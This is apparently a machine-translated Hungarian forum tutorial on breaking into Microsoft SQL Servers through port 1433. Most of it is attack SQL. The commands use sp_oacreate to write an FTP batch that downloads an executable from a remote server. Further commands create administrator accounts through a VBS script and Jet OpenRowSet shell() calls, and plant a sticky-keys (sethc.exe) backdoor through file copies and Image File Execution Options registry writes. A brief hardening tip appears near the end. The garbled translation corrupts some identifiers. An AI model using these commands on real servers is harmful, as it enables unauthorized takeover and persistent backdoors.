declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'C:\1.bat', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'open IP'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'ftp account'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'ftp jelszó'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'get en.exe (nincs net ekalációs szkript) c:\en.exe'
exec @ret = sp_oamethod @f, 'writeline', NULL,'bye'
Miután a lekérdezési analizátor sikeresen elindult, megjelenik egy 1.bat a C meghajtón (ha a végrehajtás sikeres, de a C meghajtó nincs ott, akkor megváltoztathatod a mappát írásra, mert melyik szerver C meghajtó gyökérkönyvtára tiltja az írást)
Ezután cmd végrehajtja a ftp -s:c:\1.bat
Miután ezt végrehajtotta, letölt egy nem hálózati ekalációs szkriptet a CFT meghajtó FTP-re, vagy közvetlenül ír egy VBS ekalációs szkriptet.
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set o=CreateObject( "Shell.Users" )'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set z=o.create('user')'
exec @ret = sp_oamethod @f, 'writeline', NULL,'z.changePassword "password","'
exec @ret = sp_oamethod @f, 'writeline', NULL,'z.setting("AccountType")=3'
Ezután a cmd futtatja a cscrip-et, hogy eltávolítsa a t c:\1.vbs
4. Az előzőt megjavítják, hogy cmd parancsokat hajtson végre, de néhány javítás után új problémák jelennek meg
(1) Üzenet: Hiba történt a xp_cmdshell végrehajtása során. A 'CreateProcess' hívás hibakóddal sikerült: '5'.
Az 5-ös hiba a rendszer által javasolt hibaszám, a CreateProcess pedig a szál létrehozásának jelentése, ez a hibagenerálás nagyban függ a rendszerfájlok cmd.exe között: az egyik az, hogy a cmd törlik, a másik az, hogy a cmd jogosultsága csökken.
SQL a terminálportok és a nyílt státusz ellenőrzéséhez:
Végrehajtó mester.. xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
Rendben, az alábbi kulcspont, hogy két SQL utasítással másoljuk a rendszer Explorer fájlját a rendszer shift backdoor fájljába, és a következő két utasítást külön hajtsuk végre.
Ez a nyilatkozat explorer.exe úgy másolja sethc.exe
deklaráld @o int exec sp_oacreate 'scripremove ting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe';
Ez az utasítás sethc.exe másolatot ad a dllcache könyvtárba
deklaráld @oo int exec sp_oacreate 'scrip remove ting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\ sethc.exe';
A másik két állítás sp_oacreate tárolt eljárást használ, amelyeknek odsole70.dll fájlt kell használniuk, így a fájl túlélése a létrehozás sikerével függ.
(2), xpsql.cpp: 5-es hiba a CreateProcess-ből (737-es sor)
Ez a helyzet bonyolultabb, és ezt az interneten is mondják
EXECUTIVE master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Válassz * from OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 123 /add")');
Válassz * from OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")');
Megnéztem a homokbozót, hogy felemeljem a jogokat ebben az ügyben, de a gyakorlatom alapján ez a sikerességi arány nagyon alacsony, mert a legtöbb szerver törölte a c:\windows\system32\ias\ias.mdb mappát. Ezután megpróbálhatod a képeltérítést a SETHC-vel, természetesen a képeltérítés is feltételes, az 1. létezés xp_regwrite ez a tárolt eljárás 2: 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',' Hibakereső nem törlődik
Először megkérdezheted, hogy a regisztrációs ragasztott kulcsot eltérítették-e
Végrehajtó mester.. xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
Ha a prompt nem találja meg a problémát, a bizonyítást töröljük, és ha kérik, nincs mód sethc.exe végrehajtani a sql parancsot
EXECUTIVE mester.. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image fájl végrehajtási opciók\sethc. EXE',
@value_name='Debugger',
@type='REG_SZ',
@value='C:\WINDOWS\explorer.exe'
Miután ötször csatlakoztam a terminálhoz és váltottam, közvetlenül az asztalra megy, majd manuálisan hozzáadom.

A regiszter módosítja a terminálportot

[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp]

HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp,

A képeltérítés megelőzését elsősorban a következő módszerek segítségével lehet elérni:

★ Engedélykorlátozási törvény

Ha a felhasználónak már nincs hozzáférése a regisztrációs kulcshoz, nem tudja módosítani ezeket a dolgokat. Nyisd meg a Registry Editort, és menj a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows menübe

NT\CurrentVersion\Image File Execution Options, válaszd ki ezt az elemet, jobb kattints – > jogosultságok – > haladóbb szint, és csökkentsd az adminisztrátor és rendszerfelhasználók jogosultságait (itt csak töröld az írási műveletet).

★ Gyors késvágás – rendezetlen kender módszer

Nyisd meg a regiszterszerkesztőt, és menj a sávra


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image fájl futtatási opciók



A probléma megoldható azzal, hogy közvetlenül töröljük a Képfájl Végrehajtási Opciók elemet.

SQL Command eltéríti a regisztrációt ragasztó kulcs telepítésének hátsó ajtója
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image fájl végrehajtási opciók\sethc.exe',
'Debugger','REG_SZ','C:\WINDOWS\system32\kdsn.exe'

Szoftverletöltés:
Turisták, ha szeretnétek megnézni ennek a bejegyzésnek a rejtett tartalmát, kérlekVálasz









Előző:A DDL, DML és DCL megértése
Következő:Az orákulum megkapja a string hosszfüggvényeket a length() és hengthb() függvényeit
Közzétéve 2015. 03. 19. 20:26:09 |
Nagyon lógó 1433-as behatolási eszköz
Közzétéve 2015. 03. 22. 10:36:54 |
Ez egy nagyon függő oktatóanyag
Lemondás:
A Code Farmer Network által közzétett összes szoftver, programozási anyag vagy cikk kizárólag tanulási és kutatási célokra szolgál; A fenti tartalmat nem szabad kereskedelmi vagy illegális célokra használni, különben a felhasználók viselik az összes következményet. Az oldalon található információk az internetről származnak, és a szerzői jogi vitáknak semmi köze ehhez az oldalhoz. A fenti tartalmat a letöltés után 24 órán belül teljesen törölni kell a számítógépéről. Ha tetszik a program, kérjük, támogassa a valódi szoftvert, vásároljon regisztrációt, és szerezzen jobb hiteles szolgáltatásokat. Ha bármilyen jogsértés történik, kérjük, vegye fel velünk a kapcsolatot e-mailben.

Mail To:help@itsvse.com